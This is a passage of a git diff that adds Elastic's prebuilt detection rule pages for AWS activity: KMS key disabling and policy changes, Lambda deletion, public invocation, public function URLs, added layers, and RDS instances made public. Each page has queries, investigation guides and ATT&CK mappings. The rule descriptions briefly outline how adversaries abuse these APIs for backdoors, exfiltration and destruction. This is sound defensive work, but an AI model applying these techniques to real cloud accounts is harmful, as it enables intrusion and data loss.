`source.geo` fields, and `user_agent.original` to determine whether the action originated from an expected network path or automation platform. + - Compare the actor and access key to historical usage patterns. + +- **Determine what key was affected and its criticality** + - Inspect `aws.cloudtrail.resources.arn` to identify the KMS key. + - Determine: + - The services and data protected by the key (e.g., RDS, EBS, S3, Secrets Manager). + - The environment (prod vs. dev). + - Owner or application team. + +- **Understand the scope and intent of the change** + - For `DisableKey`, determine whether a dependent service immediately began failing or experienced decryption errors. + - For `ScheduleKeyDeletion`, examine the `PendingWindowInDays` value within `aws.cloudtrail.request_parameters`. + - Check whether the key was previously rotated, enabled/disabled, or had its policy recently modified. + +- **Correlate with surrounding events** + - Look for: + - IAM policy changes granting new KMS privileges. + - Access anomalies involving the same principal. + - File system, database, or backup deletions near the same timeframe. + - S3, EBS, or RDS resources showing encryption failures. + - Determine whether other keys were modified in the same window (possible broader sabotage attempt). + +- **Validate intent with owners** + - Confirm with the application, data, or security owners: + - Whether deactivation or scheduled deletion was requested. + - Whether the key was being replaced, migrated, or retired. + + +*False positive analysis* + + +- **Planned key lifecycle activities** + - Some organizations disable KMS keys before rotation, migration, or decommissioning. + - Scheduled deletion during infrastructure teardown may be expected in CI/CD-driven ephemeral environments. + +- **Configuration errors** + - Misapplied tags or incorrect CloudFormation teardown workflows can unintentionally disable or schedule deletion of KMS keys. + +If any of the above conditions apply, consider adjusting rule exceptions based on IAM principal, environment tag, or automation role. + + +*Response and remediation* + + +- **Contain and validate** + - Immediately confirm whether the key disablement or deletion schedule was intentional. + - If unauthorized, cancel scheduled deletion (`CancelKeyDeletion`) and re-enable the key (`EnableKey`) as appropriate. + - Rotate credentials or access keys used by the actor if compromise is suspected. + +- **Assess impact** + - Identify all AWS services and data encrypted with the affected KMS key. + - Review logs and service metrics for failures involving: + - EBS volume attachments + - RDS instance decryption + - S3 object access + - Secrets Manager retrieval + - Lambda environment variable decryption + +- **Investigate for compromise** + - Review CloudTrail activity for the principal: + - Permission escalations + - Unusual STS role assumptions + - S3, EC2, RDS destructive behavior + - Look for preceding data access or exfiltration attempts. + +- **Strengthen controls** + - Restrict AWS KMS lifecycle permissions (`kms:DisableKey`, `kms:ScheduleKeyDeletion`) to a very small privileged set. + - Use AWS Organizations SCPs to prevent KMS key deletion in production accounts. + - Enable AWS Config rules for KMS key state monitoring. + - Require MFA for administrators capable of key management. + +- **Post-incident improvement** + - Update runbooks to include KMS lifecycle change approvals. + - Implement tagging standards to designate high-risk keys. + - Enhance monitoring for key policy modifications or changes to principal permissions. + + +*Additional information* + +- **https://github.com/aws-samples/aws-incident-response-playbooks/blob/c151b0dc091755fffd4d662a8f29e2f6794da52c/playbooks/[AWS IR Playbooks]** +- **https://github.com/aws-samples/aws-customer-playbook-framework/tree/a8c7b313636b406a375952ac00b2d68e89a991f2/docs[AWS Customer Playbook Framework]** +- **Security Best Practices:** https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/[AWS Knowledge Center – Security Best Practices]. + + +==== Rule query + + +[source, js] +---------------------------------- +data_stream.dataset: "aws.cloudtrail" + and event.provider: "kms.amazonaws.com" + and event.action: ("DisableKey" or "ScheduleKeyDeletion") + and event.outcome: "success" + and not user_agent.original: (*Terraform* or *Pulumi*) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Impact +** ID: TA0040 +** Reference URL: https://attack.mitre.org/tactics/TA0040/ +* Technique: +** Name: Data Destruction +** ID: T1485 +** Reference URL: https://attack.mitre.org/techniques/T1485/ +* Sub-technique: +** Name: Lifecycle-Triggered Deletion +** ID: T1485.001 +** Reference URL: https://attack.mitre.org/techniques/T1485/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-kms-key-policy-updated-via-putkeypolicy.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-kms-key-policy-updated-via-putkeypolicy.asciidoc new file mode 100644 index 0000000000..e798fe3db7 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-kms-key-policy-updated-via-putkeypolicy.asciidoc @@ -0,0 +1,129 @@ +[[prebuilt-rule-8-19-32-aws-kms-key-policy-updated-via-putkeypolicy]] +=== AWS KMS Key Policy Updated via PutKeyPolicy + +Identifies successful PutKeyPolicy calls on AWS KMS keys. The key policy is a resource-based policy that controls which principals can use the key for cryptographic operations and administration. Adversaries with "kms:PutKeyPolicy" may add or broaden principals (including external accounts) to decrypt or exfiltrate data protected by the key, or to preserve access after other credentials are rotated. This is distinct from disabling or scheduling deletion of the key. + +*Rule type*: query + +*Rule indices*: + +* filebeat-* +* logs-aws.cloudtrail-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-6m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.aws.amazon.com/kms/latest/APIReference/API_PutKeyPolicy.html +* https://docs.aws.amazon.com/kms/latest/developerguide/key-policies.html + +*Tags*: + +* Domain: Cloud +* Platform: AWS +* Data Source: AWS CloudTrail +* Service: AWS KMS +* Tactic: Defense Evasion +* Tactic: Privilege Escalation +* Rule Type: Custom Query (KQL) +* Resources: Investigation Guide + +*Version*: 2 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating AWS KMS Key Policy Updated via PutKeyPolicy* + + +`PutKeyPolicy` replaces the entire key policy for a customer managed KMS key (and is used in limited scenarios for AWS +managed keys). Unexpected changes can grant `kms:Decrypt`, `kms:GenerateDataKey`, or administrative actions to new +identities. + + +*Possible investigation steps* + + +- Identify the key from `aws.cloudtrail.resources.arn` or `aws.cloudtrail.request_parameters.keyId`. +- Inspect `policy` in `aws.cloudtrail.request_parameters` (or related fields) for new `Principal`, `AWS`, or + `kms:CallerAccount` entries and cross-account ARNs. +- Determine which data stores use the key (S3, EBS, RDS, Secrets Manager, etc.) via CMK aliases or CMDB. +- Correlate with `iam:AttachRolePolicy`, `sts:AssumeRole`, or data-plane access from newly added principals. + + +*False positive analysis* + + +- Planned multi-account encryption patterns; confirm recipient accounts are approved. + + +*Response and remediation* + + +- If unauthorized: restore a known-good policy from backup or IAM/KMS change history, remove rogue principals, and + restrict `kms:PutKeyPolicy` to break-glass roles. + + +*Additional information* + + +- https://docs.aws.amazon.com/kms/latest/APIReference/API_PutKeyPolicy.html[PutKeyPolicy] +- https://docs.aws.amazon.com/kms/latest/developerguide/key-policies.html[KMS key policies] + + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset: "aws.cloudtrail" + and event.provider: "kms.amazonaws.com" + and event.action: "PutKeyPolicy" + and event.outcome: "success" + and not aws.cloudtrail.user_identity.type: "AWSService" + and not user_agent.original: (*Terraform* or *Pulumi*) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Abuse Elevation Control Mechanism +** ID: T1548 +** Reference URL: https://attack.mitre.org/techniques/T1548/ +* Sub-technique: +** Name: Temporary Elevated Cloud Access +** ID: T1548.005 +** Reference URL: https://attack.mitre.org/techniques/T1548/005/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-lambda-function-deletion.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-lambda-function-deletion.asciidoc new file mode 100644 index 0000000000..7079ec81f8 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-lambda-function-deletion.asciidoc @@ -0,0 +1,118 @@ +[[prebuilt-rule-8-19-32-aws-lambda-function-deletion]] +=== AWS Lambda Function Deletion + +Identifies the deletion of an AWS Lambda function. Deleting a function removes its code, configuration, versions, and aliases. Adversaries may delete functions to disrupt business operations and automated workflows, to destroy attacker-deployed backdoors and remove evidence after achieving their objective, or to inhibit incident response. Because function deletion is destructive and often irreversible without redeployment, deletions performed by unexpected principals or outside change windows should be reviewed. + +*Rule type*: query + +*Rule indices*: + +* logs-aws.cloudtrail-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-6m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.aws.amazon.com/lambda/latest/api/API_DeleteFunction.html +* https://docs.aws.amazon.com/lambda/latest/dg/logging-using-cloudtrail.html + +*Tags*: + +* Domain: Cloud +* Platform: AWS +* Data Source: AWS CloudTrail +* Service: AWS Lambda +* Tactic: Impact +* Rule Type: Custom Query (KQL) +* Resources: Investigation Guide + +*Version*: 2 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating AWS Lambda Function Deletion* + + +Deleting an AWS Lambda function removes its code, configuration, published versions, and aliases. This can be a destructive action that disrupts serverless workloads and automation, or a cleanup step an adversary uses to remove a backdoor function and erase evidence after their objective is met. + +This rule detects successful `DeleteFunction` calls. Investigate whether the principal and the deleted function are expected, and whether the deletion correlates with other suspicious activity. + + +*Possible investigation steps* + + +- Identify the actor in `aws.cloudtrail.user_identity.arn` and `aws.cloudtrail.user_identity.type`, and review `source.ip` and `user_agent.original` to determine how the deletion was performed (console, CLI, SDK, automation). +- Inspect `aws.cloudtrail.request_parameters` for the `functionName` and map it to its application, owner, and environment (prod, staging, dev). +- Determine whether the deletion aligns with an approved change, decommissioning, or infrastructure-as-code destroy operation by comparing `@timestamp` against deployment and change-management records. +- Correlate with recent activity by the same principal or access key, such as `CreateFunction`, `UpdateFunctionCode`, `AddPermission`, `CreateEventSourceMapping`, log-group deletions, or other destructive or evasive actions. +- Verify whether multiple functions were deleted in a short window, which may indicate broad disruption rather than a single planned change. + + +*False positive analysis* + + +- Function deletions are common during decommissioning and infrastructure-as-code apply/destroy cycles. Deletions by approved deployment roles, CI/CD pipelines, or platform automation are expected. Tune on `aws.cloudtrail.user_identity.arn`, `user_agent.original`, or known automation roles after validation. + + +*Response and remediation* + + +- If the deletion is unauthorized, restore the function from source control or an infrastructure-as-code definition and confirm its code, configuration, and execution role match a known-good state. +- Review CloudTrail for related destructive or evasive actions by the same actor and assess operational impact. +- Rotate or restrict credentials for the principal if compromise is suspected, and constrain `lambda:DeleteFunction` to a small set of trusted roles. + + +*Additional information* + + +- https://docs.aws.amazon.com/lambda/latest/api/API_DeleteFunction.html[DeleteFunction API] + + +==== Rule query + + +[source, js] +---------------------------------- +data_stream.dataset: "aws.cloudtrail" + and event.provider: "lambda.amazonaws.com" + and event.action: (DeleteFunction or DeleteFunction20*) + and event.outcome: "success" + and not user_agent.original: (*Terraform* or *Pulumi*) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Impact +** ID: TA0040 +** Reference URL: https://attack.mitre.org/tactics/TA0040/ +* Technique: +** Name: Data Destruction +** ID: T1485 +** Reference URL: https://attack.mitre.org/techniques/T1485/ +* Technique: +** Name: Service Stop +** ID: T1489 +** Reference URL: https://attack.mitre.org/techniques/T1489/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-lambda-function-policy-updated-to-allow-public-invocation.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-lambda-function-policy-updated-to-allow-public-invocation.asciidoc new file mode 100644 index 0000000000..525eb41b26 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-lambda-function-policy-updated-to-allow-public-invocation.asciidoc @@ -0,0 +1,154 @@ +[[prebuilt-rule-8-19-32-aws-lambda-function-policy-updated-to-allow-public-invocation]] +=== AWS Lambda Function Policy Updated to Allow Public Invocation + +Identifies when an AWS Lambda function policy is updated to allow public invocation. This rule detects use of the AddPermission API where the Principal is set to "*", enabling any AWS account to invoke the function. Adversaries may abuse this configuration to establish persistence, create a covert execution path, or operate a function as an unauthenticated backdoor. Public invocation is rarely required outside very specific workloads and should be considered high-risk when performed unexpectedly. + +*Rule type*: eql + +*Rule indices*: + +* filebeat-* +* logs-aws.cloudtrail-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-6m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence +* https://stratus-red-team.cloud/attack-techniques/AWS/aws.persistence.lambda-backdoor-function/ +* https://docs.aws.amazon.com/lambda/latest/api/API_AddPermission.html + +*Tags*: + +* Domain: Cloud +* Platform: AWS +* Data Source: AWS CloudTrail +* Service: AWS Lambda +* Tactic: Persistence +* Rule Type: Event Correlation (EQL) +* Resources: Investigation Guide + +*Version*: 10 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating AWS Lambda Function Policy Updated to Allow Public Invocation* + + +AWS Lambda policies control who can invoke a function. When the `Principal` is set to `*`, the function becomes publicly invokable by any AWS account. Adversaries may modify Lambda permissions to create a stealthy execution backdoor or to maintain persistence inside an AWS environment. This activity is uncommon in most production environments and should receive careful scrutiny when detected. + + +*Possible investigation steps* + + +**Identify the actor** +- Identify the actor who made the change by reviewing `aws.cloudtrail.user_identity.arn` and access key ID. Determine whether this principal typically administers Lambda functions. + +**Review request details** +- Review request details in `aws.cloudtrail.request_parameters` to understand the exact permission added: + - Confirm that the `Principal` is set to `"*"`. + - Note the `Action` (`lambda:InvokeFunction`) and any `SourceArn` restrictions (sometimes present, often missing in malicious cases). + +**Analyze source context** +- Check the source of the request using `source.ip`, geo information, and user agent. Unexpected networks, automation tools, or CLI usage may indicate credential compromise. + +**Correlate timing and related events** +- Evaluate timing and sequence by correlating `@timestamp` with other events. Look for surrounding actions such as: + - Creation or update of Lambda function code. + - Publishing new Lambda layers. + - Changes to roles attached to the function. + +**Assess function sensitivity and impact** +- Assess the function’s role and data sensitivity. Determine whether public invocation could: + - Enable unmonitored code execution, + - Trigger access to internal resources via the function’s IAM role, + - Be chained with persistence or privilege escalation behavior. + +**Validate operational intent** +- Validate the operational context. Confirm with the function owner whether the permission change was intentional, part of a deployment, or unexpected. + + +*False positive analysis* + + +- Public invocation may be intentional for certain workloads (e.g., webhook handlers, openly accessible compute functions). Compare the event with documentation, IaC templates, or the deployment pipeline. +- Some teams may regularly modify permissions during testing or refactoring; check whether this aligns with existing workflows. +- Evaluate whether the function already had permissive invocation policies and whether the update is part of expected configuration drift. + + +*Response and remediation* + + +- Remove unauthorized public invocation permissions immediately by reverting the Lambda function policy to the approved baseline. +- Investigate for follow-on activity: execution of the function, updates to code, modifications to IAM roles, or API calls issued using the function's role. +- Rotate or disable credentials associated with the identity that issued the `AddPermission` call if compromise is suspected. +- Enable or refine monitoring for Lambda policy updates, layer additions, and code changes to detect future unauthorized modifications. +- Conduct a security review of the Lambda function and any downstream resources it can access to ensure no misuse has occurred. +- Work with the application team to enforce least-privilege invocation policies and deploy guardrails (e.g., SCPs, IAM Conditions, or automated compliance checks) preventing public invocation unless explicitly authorized. + + +*Additional information* + +- **https://github.com/aws-samples/aws-incident-response-playbooks/blob/c151b0dc091755fffd4d662a8f29e2f6794da52c/playbooks/[AWS IR Playbooks]** +- **https://github.com/aws-samples/aws-customer-playbook-framework/tree/a8c7b313636b406a375952ac00b2d68e89a991f2/docs[AWS Customer Playbook Framework]** +- **https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/[AWS Knowledge Center – Security Best Practices]** + + +==== Rule query + + +[source, js] +---------------------------------- +info where data_stream.dataset == "aws.cloudtrail" + and event.provider == "lambda.amazonaws.com" + and event.outcome == "success" + and event.action : "AddPermission*" + and stringContains(aws.cloudtrail.request_parameters, "lambda:InvokeFunction") + and stringContains(aws.cloudtrail.request_parameters, "principal=\\*") + and not user_agent.original like~ ("*Terraform*", "*Pulumi*") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Event Triggered Execution +** ID: T1546 +** Reference URL: https://attack.mitre.org/techniques/T1546/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Modify Cloud Compute Infrastructure +** ID: T1578 +** Reference URL: https://attack.mitre.org/techniques/T1578/ +* Sub-technique: +** Name: Modify Cloud Compute Configurations +** ID: T1578.005 +** Reference URL: https://attack.mitre.org/techniques/T1578/005/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-lambda-function-url-created-with-public-access.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-lambda-function-url-created-with-public-access.asciidoc new file mode 100644 index 0000000000..551c2fab84 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-lambda-function-url-created-with-public-access.asciidoc @@ -0,0 +1,131 @@ +[[prebuilt-rule-8-19-32-aws-lambda-function-url-created-with-public-access]] +=== AWS Lambda Function URL Created with Public Access + +Identifies the creation or update of an AWS Lambda function URL configured with an authentication type of NONE, which exposes the function to unauthenticated invocation directly from the public internet. Adversaries can use a public function URL to establish a durable, internet-reachable entry point for command and control, data egress, or on-demand execution of attacker-controlled code, bypassing the need for valid AWS credentials to invoke the function. Function URLs with public access should be rare and deliberate, so this configuration warrants review. + +*Rule type*: eql + +*Rule indices*: + +* logs-aws.cloudtrail-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-6m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.aws.amazon.com/lambda/latest/dg/lambda-urls.html +* https://docs.aws.amazon.com/lambda/latest/dg/urls-auth.html + +*Tags*: + +* Domain: Cloud +* Platform: AWS +* Data Source: AWS CloudTrail +* Service: AWS Lambda +* Tactic: Defense Evasion +* Tactic: Persistence +* Rule Type: Event Correlation (EQL) +* Resources: Investigation Guide + +*Version*: 3 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating AWS Lambda Function URL Created with Public Access* + + +A Lambda function URL is a dedicated HTTPS endpoint for a function. When configured with `authType=NONE`, anyone on the internet can invoke the function without AWS authentication. Adversaries use this to create a public, persistent entry point for command and control, data exfiltration, or running attacker-controlled code without needing AWS credentials. + +This rule detects successful `CreateFunctionUrlConfig` and `UpdateFunctionUrlConfig` calls where the auth type is set to NONE. + + +*Possible investigation steps* + + +- Identify the actor in `aws.cloudtrail.user_identity.arn` and `aws.cloudtrail.user_identity.type`, and review `source.ip` and `user_agent.original` to determine how the change was made. +- Inspect `aws.cloudtrail.request_parameters` for the `functionName` and the auth type, and review `aws.cloudtrail.response_elements` for the resulting `functionUrl`. +- Determine whether the function is intended to be public and whether the owning team requested an unauthenticated endpoint. +- Review the function's code, execution role, and recent changes (`UpdateFunctionCode`, `UpdateFunctionConfiguration`, `AddPermission`) for signs of tampering. +- Correlate with other activity by the same principal, and check the function's invocation and access logs for traffic from unexpected sources after the URL was exposed. + + +*False positive analysis* + + +- Public webhooks, simple APIs, and front-end integrations sometimes use unauthenticated function URLs intentionally. Confirm the exposure is approved and exclude known public endpoints on `functionName` or `aws.cloudtrail.user_identity.arn` after validation. + + +*Response and remediation* + + +- If the exposure is unauthorized, change the function URL auth type to `AWS_IAM` or delete the function URL configuration, and review the function code and execution role for compromise. +- Examine invocation logs for unauthenticated requests received while the URL was public and assess potential impact. +- Rotate or restrict credentials for the principal if compromise is suspected, and constrain `lambda:CreateFunctionUrlConfig` and `lambda:UpdateFunctionUrlConfig` to trusted roles. + + +*Additional information* + + +- https://docs.aws.amazon.com/lambda/latest/dg/lambda-urls.html[Lambda function URLs] +- https://docs.aws.amazon.com/lambda/latest/dg/urls-auth.html[Security and auth model for Lambda function URLs] + + +==== Rule query + + +[source, js] +---------------------------------- +any where data_stream.dataset == "aws.cloudtrail" + and event.provider == "lambda.amazonaws.com" + and event.outcome == "success" + and not (user_agent.original : "*terraform*" or user_agent.original : "*pulumi*" or user_agent.original : "*ansible*") + and not (aws.cloudtrail.user_identity.arn : "*terraform*" or aws.cloudtrail.user_identity.arn : "*pulumi*" or aws.cloudtrail.user_identity.arn : "*ansible*") + and (event.action : "CreateFunctionUrlConfig*" or event.action : "UpdateFunctionUrlConfig*") + and stringContains(aws.cloudtrail.request_parameters, "authType=NONE") + and not user_agent.original like~ ("*Terraform*", "*Pulumi*") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: External Remote Services +** ID: T1133 +** Reference URL: https://attack.mitre.org/techniques/T1133/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Modify Cloud Compute Infrastructure +** ID: T1578 +** Reference URL: https://attack.mitre.org/techniques/T1578/ +* Sub-technique: +** Name: Modify Cloud Compute Configurations +** ID: T1578.005 +** Reference URL: https://attack.mitre.org/techniques/T1578/005/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-lambda-layer-added-to-existing-function.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-lambda-layer-added-to-existing-function.asciidoc new file mode 100644 index 0000000000..df2db35ddb --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-lambda-layer-added-to-existing-function.asciidoc @@ -0,0 +1,149 @@ +[[prebuilt-rule-8-19-32-aws-lambda-layer-added-to-existing-function]] +=== AWS Lambda Layer Added to Existing Function + +Identifies when a Lambda layer is added to an existing AWS Lambda function. Lambda layers allow shared code, dependencies, or runtime modifications to be injected into a function’s execution environment. Adversaries with the ability to update function configurations may add a malicious layer to establish persistence, run unauthorized code, or intercept data handled by the function. This activity should be reviewed to ensure the modification is expected and authorized. + +*Rule type*: query + +*Rule indices*: + +* filebeat-* +* logs-aws.cloudtrail-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-6m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence +* https://docs.aws.amazon.com/lambda/latest/api/API_PublishLayerVersion.html +* https://docs.aws.amazon.com/lambda/latest/api/API_UpdateFunctionConfiguration.html + +*Tags*: + +* Domain: Cloud +* Platform: AWS +* Data Source: AWS CloudTrail +* Service: AWS Lambda +* Tactic: Execution +* Rule Type: Custom Query (KQL) +* Resources: Investigation Guide + +*Version*: 10 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating AWS Lambda Layer Added to Existing Function* + + +Lambda layers introduce external code artifacts into a function’s runtime. Adding a layer to an existing Lambda function +modifies its execution environment and may allow an adversary to run arbitrary code, intercept data, or maintain +persistence without altering the function source itself. This detection highlights successful configuration updates using +`PublishLayerVersion*` or `UpdateFunctionConfiguration*`. + + +*Possible investigation steps* + + +**Identify the actor** +- Review `aws.cloudtrail.user_identity.arn` and the `access_key_id`. Determine whether the actor normally administers Lambda or has recently exhibited unusual behavior. + +**Review what was modified** +- Inspect `aws.cloudtrail.request_parameters` to identify which layer ARN was added, the function name and region, whether multiple layers were applied at once or in rapid succession. +- Compare the added layer version against known and approved layer catalogs. + +**Validate the operational context** +- Check the time of the update (`@timestamp`) to see if it aligns with known release pipelines or deployment windows and Normal working hours for the responsible team. +- Determine whether a CI/CD pipeline or IaC tool was expected to update this function. + +**Assess where the change came from** +- Review `source.ip` and `user_agent.original` for signs of console access from unusual locations, access via previously unused automation tools, suspicious programmatic access consistent with compromised keys. + +**Correlate with additional activity** +- Look for preceding or subsequent events such as: + - Creation of new Lambda layers (`PublishLayerVersion`). + - IAM role modifications affecting the Lambda function. + - Increased invocation volume or unusual invocation patterns after the layer addition. +- Search for other functions modified by the same actor or from the same IP. + + +*False positive analysis* + + +- Confirm whether the change aligns with a planned deployment, application update, or dependency upgrade. +- Determine whether the user or automation role commonly modifies Lambda function configurations. +- Validate the legitimacy of the added layer by checking internal documentation or release notes. + + +*Response and remediation* + + +- Remove or roll back the added layer if the modification appears unauthorized or suspicious. +- Review the layer contents, especially for newly published layers, to verify integrity and legitimacy. +- Investigate the IAM role or user responsible for the change and rotate compromised credentials if necessary. +- Tighten permissions by ensuring only approved roles can modify Lambda configurations or publish new layers. +- Implement monitoring for subsequent Lambda configuration changes, invocation anomalies caused by the injected layer, additional persistence techniques targeting serverless infrastructure. + + +*Additional information* + +- **https://github.com/aws-samples/aws-incident-response-playbooks/blob/c151b0dc091755fffd4d662a8f29e2f6794da52c/playbooks/[AWS IR Playbooks]** +- **https://github.com/aws-samples/aws-customer-playbook-framework/tree/a8c7b313636b406a375952ac00b2d68e89a991f2/docs[AWS Customer Playbook Framework]** +- **https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/[AWS Knowledge Center – Security Best Practices]** + + +==== Rule query + + +[source, js] +---------------------------------- +data_stream.dataset: aws.cloudtrail + and event.provider: lambda.amazonaws.com + and event.outcome: success + and event.action: (PublishLayerVersion* or UpdateFunctionConfiguration*) + and not user_agent.original: (*Terraform* or *Pulumi*) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Serverless Execution +** ID: T1648 +** Reference URL: https://attack.mitre.org/techniques/T1648/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Modify Cloud Compute Infrastructure +** ID: T1578 +** Reference URL: https://attack.mitre.org/techniques/T1578/ +* Sub-technique: +** Name: Modify Cloud Compute Configurations +** ID: T1578.005 +** Reference URL: https://attack.mitre.org/techniques/T1578/005/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-rds-db-instance-made-public.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-rds-db-instance-made-public.asciidoc new file mode 100644 index 0000000000..6d83e1e04f --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-rds-db-instance-made-public.asciidoc @@ -0,0 +1,188 @@ +[[prebuilt-rule-8-19-32-aws-rds-db-instance-made-public]] +=== AWS RDS DB Instance Made Public + +Identifies the creation or modification of an Amazon RDS DB instance or cluster where the "publiclyAccessible" attribute is set to "true". Publicly accessible RDS instances expose a network endpoint on the public internet, which may allow unauthorized access if combined with overly permissive security groups, weak authentication, or misconfigured IAM policies. Adversaries may enable public access on an existing instance, or create a new publicly accessible instance, to establish persistence, move data outside of controlled network boundaries, or bypass internal access controls. + +*Rule type*: eql + +*Rule indices*: + +* filebeat-* +* logs-aws.cloudtrail-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-6m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_ModifyDBInstance.html +* https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/Overview.DBInstance.Modifying.html +* https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence#make-instance-publicly-accessible-rds-modifydbinstance +* https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc#rds-createdbinstance + +*Tags*: + +* Domain: Cloud +* Platform: AWS +* Data Source: AWS CloudTrail +* Service: AWS RDS +* Tactic: Defense Evasion +* Tactic: Persistence +* Rule Type: Event Correlation (EQL) +* Resources: Investigation Guide + +*Version*: 10 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating AWS RDS DB Instance Made Public* + + +This rule detects when an Amazon RDS DB instance or cluster is created or modified with +`publiclyAccessible=true`. While some environments operate publicly accessible RDS instances, +unexpected exposure of a database to the internet is a meaningful security risk. Adversaries who +gain access to AWS credentials may modify a DB instance’s public accessibility to exfiltrate data, +establish persistence, or bypass internal network restrictions. + + +*Possible Investigation Steps* + + +- **Identify the actor** + - Review `aws.cloudtrail.user_identity.arn`, `aws.cloudtrail.user_identity.type`, and `access_key_id` to determine which IAM principal made the change. + - Determine whether the user, role, or automation service typically manages RDS configurations. + +- **Examine the request parameters** + - Review `aws.cloudtrail.request_parameters` for: + - `publiclyAccessible=true` + - DBInstanceIdentifier / DBClusterIdentifier + - Additional changes included in the same modification 